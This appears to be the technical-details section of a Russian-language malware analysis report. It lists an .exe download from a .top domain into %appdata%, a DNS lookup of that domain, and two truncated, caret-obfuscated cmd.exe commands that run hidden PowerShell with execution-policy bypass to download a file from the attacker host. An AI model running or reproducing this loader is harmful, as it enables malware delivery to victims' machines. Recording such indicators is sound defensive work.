Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWERs^he^Ll^.^eXe^ -^E^XE^c^u^tIo^nP^olICY^ b^yp^a^SS ^-NO^PrOF^I^le ^-W^inDowStyLe Hid^dEN (^NeW-OBJeCT syS^tEm.N^ET^.wEBCLI^e^n^T^).^DOwn^loAD^F^I^L^e(^'http://sutraponef...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "POWERs^he^Ll^.^eXe^ -^E^XE^c^u^tIo^nP^olICY^ b^yp^a^SS ^-NO^PrOF^I^le ^-W^inDowStyLe Hid^dEN (^NeW-OBJeCT syS^tEm.N^ET^.wEBCLI^e^n^T^).^DOwn^loAD^F^I^L^e(^'http://sutraponef...' (со скрытым окном)